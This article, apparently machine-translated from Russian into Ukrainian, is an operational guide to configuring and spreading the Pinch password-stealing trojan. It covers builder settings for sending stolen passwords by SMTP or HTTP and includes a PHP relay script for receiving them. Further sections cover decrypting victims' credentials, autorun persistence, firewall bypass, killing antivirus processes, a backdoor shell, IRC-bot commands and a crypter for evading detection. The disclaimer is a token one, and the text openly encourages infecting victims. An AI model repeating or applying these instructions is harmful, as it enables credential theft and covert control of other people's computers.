Ламаємо мило, юзаем BrutusAET2
-------------------------------------------------- ----------------
частина 1. старе, але корисне. для пинч 1
***********************
Інструкція по Pinch 1.0
***********************
=====
Intro
=====
Прошу не дивуватися, що я вирішив написати подібну статтю (article for lamerzzz). Справа в тому, що на моєму форумі (http://forum.web-hack.ru) приблизно раз в три дні створюється тема, на кшталт "Як правильно налаштувати і використовувати Pinch?", "Як користуватися Pinch`ем?" і т.д.
===========
можливості
===========
Даний троян отримав досить велике поширення в 2003/2004 році. Все завдяки можливості красти велике у паролів (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Bat! 2, Outlook / Outlook Express, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), невеликій вазі, відкритим ісходникам і легкістю створення троя для конкретного завдання. Троян має такі можливості:
- Відправляти конфігурацію комп'ютера жертви: ОС, оператіка, CPU, HDD, logged user, host name, IP
- Шпигун клавіатури (Key-log)
- Дистанційна консоль (Remote console)
- Обхід Firewall`а
- Відправка всіх паролів на E-mail використовуючи SMTP-сервер
- Шифрування вкрадених паролів пересилаються поштою
- Автовидалення трояна після запуску
- HTML / Text звіти
- Розмір файлу приблизно 10Kb
- Модульна система
- І багато іншого...
Троян написав coban2k (http://www.cobans.net) - досить відома людина в світі ICQ-хакинга. Унаслідок проблем з хостингом з приводу зберігання трояна на їх сервері, автор був змушений прибрати це творіння з свого сайту. На жаль вже майже всі антивіруси знаходять цей трой і його можна впарити тільки жертви, у якої не варто антивіруса.
============
Комплектація
============
До архіву (pinch_1.0.zip) з трояном входять наступні папки і файли:
\ PinchBuilder.exe - майстер для створення трояна
\ Parser.exe - програма для розшифровки закодованих листів з паролями
\ Readme.txt - без коментарів
\ Pinch \ - головна папка з asm-исходниками трояна і компілятором
\ Sources \ - інші вихідні
\ TB! 2 Plugin (Auto-parser) \ - папка з плагіном для The Bat 2 !, Який декодує зашифровані листи з паролями, що приходять на вашу поштову скриньку
\ Sources \ Script \ - PHP-скрипт, через який відсилаються паролі при виборі відповідної опції при компіляції (читайте далі)
================
компілюємо трой
================
У комплекті поставляється спеціальний майстер (PinchBuilder.exe), який і займається створенням трояна по вашим вимогам і компіляцією трояна прямо на вашому комп'ютері. Програма має дві головні вкладки: Compile і Decrypt. Перша служить для створення трояна, а друга для розшифровки паролів (по суті ця вкладка є результатом роботи файлу Parser.exe). Далі йдуть три під-вкладки: SMTP, HTTP і FILE. У них задаються варіант виведення паролів. Розберемо кожну докладніше:
========
SMTP
========
В поле Server вводимо адресу (hostname / ip) SMTP-сервера. Якщо ви ввели домен сервера, то натисніть Resolve, щоб домен сервера прийняв вид IP-адреси. Далі в полях From і To вказуємо своє мило. Кнопка Send test massage служить для тестової відправки листа, через настройки зазначені вами. Настійно рекомендую їй скористатися. Якщо лист не приходить, то це означає, що є якісь проблеми з відправкою (включений фаєрволл, поганий SMTP, що не натиснули на Resolve і т.д.).
Хочу зауважити, що останнім часом більшість провайдерів переходять на систему, за якою їх клієнти можуть відправити листа ТІЛЬКИ з ЇХ SMTP-Вервера. У таких випадках рекомендую користуватися методом відправки листів, через HTTP.
====
HTTP
====
Закачуємо файл \ Sources \ Script \ view.php на сервер підтримує PHP-скрипти і виконують функцію mail (). Далі в поле URL вказуємо шлях до цього скрипту (наприклад, http://www.xss.ru/pinch.php). В поле Subject вказуємо ім'я теми, з якої будуть відходити листи. В поле Status check str повинна перебувати рядок, яка видається скриптом після його завантаження. В скрипті йде в комплекті з Троєм воно має значення: _ret_ok_1:
<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
Якщо дане значення не буде вжито трояном, то він буде намагатися відправити лист через цей скрипт кожну хвилину, поки не отримає у відповідь рядок з поля Status check str. Я вам рекомендую використовувати скрипт не зі стандартної поставки, а написаний мною:
<Html> <body>
<? Php
// Author: Terabyte (http://www.web-hack.ru)
$ Email = $ _ POST [ 'a'];
$ Subject = $ _ POST [ 'b'];
$ Msg = $ _ POST [ 'c'];
if (isset ($ email) and isset ($ subject) and isset ($ msg)) {
mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>
Робить він майже те ж саме, але більш грамотно написаний. Величезним плюсом при використанні даного методу відправки паролів являєся, той факт, що він дозволяє відправляти паролі в обхід Firewall`а. Як це досягається? Ось вирізка з балки outpost`а в момент відправки пароля через скрипт з мого сайту:
Ім'я процесу: iexplorer.exe
Протокол: HTTP
Віддалений адреса: www.web-hack.ru
Я думаю всі зрозуміли, хто не в танку =) Так само з плюсів я можу я можу виділити можливість записувати зашифровані листи на вашому сайті, а не відправляти на мило; можливість міняти мило на яке відсилаються паролі, на випадок якщо його видалять; при масовому розсиланні троя (щоб паролі могли бути відправлені навіть з тих провайдерів, де відключений доступ до всіх SMTP-серверів, крім їх нього)
====
FILE
====
На даний вкладці задається шлях до файлу, в який збережуться всі паролі. Для цього в поле Path треба записати шлях до файл (наприклад, C: \ password.txt).
================
Compiler Options
================
У даній області все зрозуміло, тут треба просто поставити галочки в тих полях, де вам це потрібно. Варто звернутися увагу на поле Add Icon. У ньому вказує шлях до іконки з якої буде відображатися скомпільований троян. Хочу зауважити що на моїй системі (Windows XP) мені так і не вдалося скомпілювати троя з цією включеною опцією і її довелося відключити.
У полях Protocol вказуємо метод, яким будуть відправлятися паролі (SMTP / HTTP / FILE). Далі натискаємо кнопку Compile і повинна піти компіляція трояна, який збережеться в основну папку з майстром для його створення.
===================
розшифровка паролів
===================
Припустимо вам вдалося впарити ламеру цей трой і вам на мило прийшли паролі з машини жертви. Справа в тому, що при пересиланні паролі шифруються і їх для початку треба розшифрувати (якщо у вас не встановлений спеціальний плагін до TheBat! Описаний вище). Копіюємо в буфер обміну текст з закодованими паролями, відкриваємо Parser.exe (або вкладку Decrypt в PinchBuilder.exe) і натискаємо в контекстному меню пунк Process Data (або просто натискаємо комбінацію клавіш Alt + C). Далі програма видасть вам всі дані вкрадені у жертви з зручному вигляді. Далі ви можете їх зберегти або роздрукувати.
==========
висновок
==========
Хочу вас застерегти, що при використанні даного трояна ви відразу потрапляє під 273 статтю КК РФ і можете бути серйозно покарані ;-) Я (автор статті) НЕ несу ніякої відповідальності за шкоду, яка може бути завдана якихось особам після прочитання моєї статті.
----------------------------------------
частина 2. інструкція до пинч 2.58
Невелика статейка по елементарної настройки пинча. Не судіть строго, але критикуйте на весь рот. Стаття з налаштування Pinch 2.58.
Думаю, що з crack-ом проблем немає ніукаво, так як там докладний help і навіть відео додається. Я ж хочу показати як в билдер налаштовувати трой:
SMTP Properties
Server (вводиш, в твоєму випадку smtp.mail.ru), потім обов'язково натискаєш Resolve щоб воно перетворилося в IP (до речі. Всі махінації треба проводити при підключеному інтернеті)
Port - залишай як і є
Protocol - вибір як буде виходити звіт, по SMTP, HTTP (через php) і FILE - зберігатися на комп'ютері. Однойменні кнопки (SMTP, HTTP, FILE) настройка протоколів, але нас в даному випадку цікавить SMTP і його ми вже набудували ..
Кнопка TestSend відправка тестового повідомлення на mail.
Вкладка PWD - прет паролі з перерахованих програм. Пункт ENABLE PWD при знятті галки звіти не міститимуть паролі.
Галка Do not send old report - НЕ слати старі звіти.
Галки Encrypt і Packing взаємопов'язані. FSG, UPX, MEW вибір способу упаковки.
Вкладка RUN - вибір способів автозапуску. Думаю розберешся в ній. Запучкать як .... standart, DLL, Undelate Service. Перемістити в папку ..... або сам вказуєш або вибираєш одну з системних. Справа стовпець Values я його і не чіпав і чесно кажучи смутно уявляю навіщо він. Знизу праворуч - bypass Windows Firewall (SP2) - обходити системний файрвол в SP2 (на скільки я знаю механізм цього пункту - це він запускається, як iexplorer.exe)
Вкладка SPY - якісь додаткові звіти - у мене воно не працювало. Пунктик screen spy - взяття скріншоту, але знову ж таки у мене воно не працювало (сркін надсилався, але він був порожній)
Вкладка NET - я їй не користувався. Вона призначена для того щоб:
1. Відкрити якийсь порт на зараженому комп'ютері, і відповідно отримати до нього доступ (настійно несоветую цим користуватися, якщо не зашіфруешься, якщо тебе зловлять, то сам здогадуєшся що буде ...)
2. Downloader - вказівка прямого посилання на який-небудь файл який повинен скачати і запуститися (прикинь, які витрати понесе твій ворог якщо у нього трафік ......))))
3. AutoUpdate - автообновление - трой, по завершенні роботи, викачує свою копію, а потім самовидаляється і на наступну завантаження системи, запускається вже нова копія (це для більшої надійності. Що б його не знайшли.
Вкладка BD (backdoor) - консоль відкриває шелл на вибраному порту, управління через телнет (telnet.exe) або альтернативні проги. (Сам не пробував)
Вкладка ECT - склейка з будь-яким файлом, а так само установка іконки ... Так само можна зробити, що б, вискакувало повідомлення ... Але щось не працює ...
Вкладка KILL - вбивство кокого-якого процесу (можна спробувати і антивірус вбити), наприклад "spidernt" - і тоді відключиться монітор DrWEB-а (попереджаю, я це ще не дала, але спробую)
Вкладка IE - установка на браузер своєї стартової сторінки. Додавання сторінки в Вибране ....
Вкладка WORM - шо ЦЕ таке, я не ведую ... .....
Вкладка IRC-bot - доступ до комп'ютера через IRC:
.login авторизація
.die - завершення роботи бота
.download - стрибка файлу з урла
.httpd - відкрити доступ до файлу через http на певному порту
.killthread - завершення певного завдання
.proxy - відкриття сокс4 з обраною порту з обраним id
.raw - відсилання raw тексту на даний irc сервер
.remove - самоудаленіе
.restart - перезапуск
.run - запускати команди
.scan - сканування IP адрес на певні відкриті порти
.shell - відкриття шелла на певному порту (не в 95/98 / ME)
.status - показати версію, IP, дату запуску
.threads - показати активні завдання
.update - самовідновлення бота зі спеціального урла
.visit - відвідати обраний урл приховано
.url - відвідати обраний урл відкрито
.link - додати в favorits
.sp - зробити стартовою
.msg - повідомлення (messagebox)
Ось начебто все .... Натискаєш COMPILE і у тебе в папці з билдер з'являється трой ...
ХАЙ ЩАСТИТЬ!!!!!
PS Це, типу, все написано для ознайомлення і автор не несе ніякої відповідальності за наслідки ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Особливості крипта:
Використовується поліморний криптор
Обхід KIS і Outpost (в тому числі останні версії)
самоудаленіе
Зменшення розміру (Звичайний пинч зменшується на 3-6кб, лоадер zupacha на 60-80кб)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.